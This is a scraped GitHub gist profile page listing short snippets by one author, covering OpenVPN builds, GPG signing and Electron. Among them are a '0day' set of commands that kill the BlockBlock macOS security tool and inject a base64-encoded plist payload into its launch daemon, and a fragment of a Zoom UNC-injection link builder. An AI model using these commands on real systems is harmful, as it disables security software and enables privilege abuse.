Skip to content

Instantly share code, notes, and snippets.


Sabri pwnsdx

View GitHub Profile
pwnsdx /
Last active Dec 22, 2018
Change creation/access/modification time recursively
find . -exec touch -t 199912312359 {} \;
pwnsdx / gist:71c421abf2a45ac4c6df
Created Jan 30, 2016
Build development version of OpenVPN with latest version of LibreSSL
View gist:71c421abf2a45ac4c6df
# Install mandatory dependencies
brew install --build-from-source automake autoconf libtool pkg-config
# Install LibreSSL from sources
brew install --build-from-source libressl
# LDFLAGS: -L/usr/local/opt/libressl/lib
# CPPFLAGS: -I/usr/local/opt/libressl/include
# Clone OpenVPN from the repo
cd $HOME/Desktop && git clone && mv openvpn openvpn-dev-2.4.0 && cd openvpn-dev-2.4.0
pwnsdx / openvpn.conf
Last active Dec 22, 2018
Verify OpenVPN CA/CN in Node.JS ( used here)
View openvpn.conf
# Add this in the config file
tls-verify "/usr/local/bin/node [absolute path]/verify.js 'C=RO, ST=BUC, O=VPN.AC, OU=VPN.AC CA, CN=VPN.AC,' ch1-4096"
pwnsdx /
Last active Dec 22, 2018
How to erase Sublime Text 3 interesting logs

Hi there,

How to erase Sublime Text 3 interesting logs

Yes, Sublime Text is logging a lot of interesting informations in its .sublime_session file like everything you search in files and the path of each files you open, forever.

How do I prevent that?

You can't. Unless by creating a symlink of the .sublime_session file to /dev/null which is, a bad practice for this software I think. Instead, I can only suggest you to execute the command below from time to time. It will securely remove the file in 7 passes.

pwnsdx / dos-experiment.html
Last active Mar 25, 2019
Chrome / IE / Opera / ... DoS
View dos-experiment.html
pwnsdx / index.html
Created Mar 30, 2019
Electron Fiddle Gist
View index.html
<!DOCTYPE html>
<meta charset="UTF-8">
<title>Hello World!</title>
<h1>Hello World!</h1>
<!-- All of the Node.js APIs are available in this renderer process. -->
We are using Node.js <script>document.write(process.versions.node)</script>,
pwnsdx /
Last active Apr 19, 2020
Sign commits automatically on macOS Sierra and Github Desktop
# Install GPG Tools 2 and generate your PGP keys
# Add the public key in your Github account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this:
# Ty
git config --global user.signingkey [LONG KEY ID] && git config --global commit.gpgsign true && git config --global gpg.program gpg2; echo 'no-tty' >> ~/.gnupg/gpg.conf
pwnsdx /
Last active Jun 3, 2020
Multiple ways to bypass BlockBlock (<=0.9.4, 0DAY)
# 1. Kill BlockBlock Agent
(pkill -n BlockBlock; touch ~/Library/LaunchAgents/com.fsociety.unprivilegied.plist; /Applications/ agent)
# 2. Kill BlockBlock Daemon (require privileges)
(pkill -o BlockBlock; touch /Library/LaunchDaemons/com.fsociety.rootkit.plist; /Applications/ daemon)
# 3. Inject malicious datas into existing plists (will create "pwned" file in /tmp) (require privileges)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBPdG91Y2ggL3RtcC9wd25lZDsgL0FwcGxpY2F0aW9ucy9CbG9ja0Jsb2NrLmFwcC9Db250ZW50cy9NYWNPUy9CbG9ja0Jsb2NrIGRhZW1vbglfECJjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suZGFlbW9uCBEnOkRKS09UV6mqAAAAAAAAAQEAAAAAAAAADAAAAAAAAAAAAAAAAAAAAM8=" | base64 --decode) > /Library/LaunchDaemons/com.objectiveSee.blockblock.plist)
# 4. Same as 3 but use hard links (will create "pwned" file in /tm
pwnsdx / converter.js
Last active Oct 18, 2020
Zoom UNC Injection via Link Previews
View converter.js
// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&"
// Your URL is zoommtg://
pwnsdx /
Last active Nov 18, 2020
Change your MAC address on iOS 7-8 (not working on iOS 9 atm)

Hi there,

Change your MAC address on iOS 7-8

Changing your MAC address can be extremely useful in some situation. Let me give you a few:

  • You are limited by time on public networks and everyone want more than just 15 minutes of internet.
  • You want to regenerate your UDID
  • A lot of governments rely on this to find you and then intercept your datas. In France for example, secret services have full access to public Wi-Fi and therefore can locate you by using your MAC address.